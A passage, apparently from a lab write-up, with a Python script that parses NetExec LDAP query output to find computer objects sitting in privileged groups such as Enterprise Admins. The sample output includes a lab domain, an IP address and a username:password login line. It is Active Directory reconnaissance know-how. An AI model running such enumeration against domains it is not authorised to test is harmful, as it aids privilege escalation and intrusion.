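NEW_OBJECT = re.compile(r"^\[\+\] Response for object: (.+)$")

# Constructed sample in the layout of `nxc ldap --query` output: the FileServer
# object as shown on the page plus a constructed WebServer control object.
SAMPLE_QUERY_OUTPUT = """\
LDAP        10.201.34.69    389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP        10.201.34.69    389    DC01             [+] SOUPEDECODE.LOCAL\\ybob317:ybob317
LDAP        10.201.34.69    389    DC01             [+] Response for object: CN=FileServer,CN=Computers,DC=SOUPEDECODE,DC=LOCAL
LDAP        10.201.34.69    389    DC01             objectClass          top
LDAP        10.201.34.69    389    DC01                                  person
LDAP        10.201.34.69    389    DC01                                  organizationalPerson
LDAP        10.201.34.69    389    DC01                                  user
LDAP        10.201.34.69    389    DC01                                  computer
LDAP        10.201.34.69    389    DC01             cn                   FileServer
LDAP        10.201.34.69    389    DC01             memberOf             CN=Enterprise Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL
LDAP        10.201.34.69    389    DC01             [+] Response for object: CN=WebServer,CN=Computers,DC=SOUPEDECODE,DC=LOCAL
LDAP        10.201.34.69    389    DC01             objectClass          top
LDAP        10.201.34.69    389    DC01                                  computer
LDAP        10.201.34.69    389    DC01             cn                   WebServer
"""


def parse_query_output(text):
    """Return [{'dn': ..., 'attrs': {name: [values]}}] from nxc --query output."""
    objects, current, last_attr, attr_indent = [], None, None, None
    for line in text.splitlines():
        m = LINE_PREFIX.match(line)
        if not m:
            continue
        rest = line[m.end():]
        stripped = rest.strip()
        if not stripped:
            continue
        indent = len(rest) - len(rest.lstrip())
        obj = NEW_OBJECT.match(stripped)
        if obj:
            current = {"dn": obj.group(1), "attrs": {}}
            objects.append(current)
            last_attr, attr_indent = None, None
            continue
        if current is None or stripped.startswith("["):
            continue                        # banner / authentication lines
        if attr_indent is None:
            attr_indent = indent            # column where attribute names start
        if indent > attr_indent and last_attr:
            current["attrs"][last_attr].append(stripped)   # extra value of a multi-valued attr
        else:
            name, _, value = stripped.partition(" ")
            last_attr = name
            current["attrs"].setdefault(name, []).append(value.strip())
    return objects


def rdn_value(dn):
    """First RDN value of a DN: 'Enterprise Admins' from 'CN=Enterprise Admins,CN=Users,...'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def privileged_computers(objects, privileged=PRIVILEGED_GROUPS):
    """(computer name, group) pairs for computer objects in a privileged group."""
    hits = []
    for o in objects:
        if "computer" not in o["attrs"].get("objectClass", []):
            continue
        for group_dn in o["attrs"].get("memberOf", []):
            if rdn_value(group_dn) in privileged:
                hits.append((rdn_value(o["dn"]), rdn_value(group_dn)))
    return hits


if __name__ == "__main__":
    for name, group in privileged_computers(parse_query_output(SAMPLE_QUERY_OUTPUT)):
        print(f"computer {name} is a member of {group}")
```

Membership through nested groups does not show up in a plain `memberOf` read, which is why the direct filter uses the in-chain matching rule; `adminCount=1` on a computer object is another quick indicator that SDProp has treated it as protected.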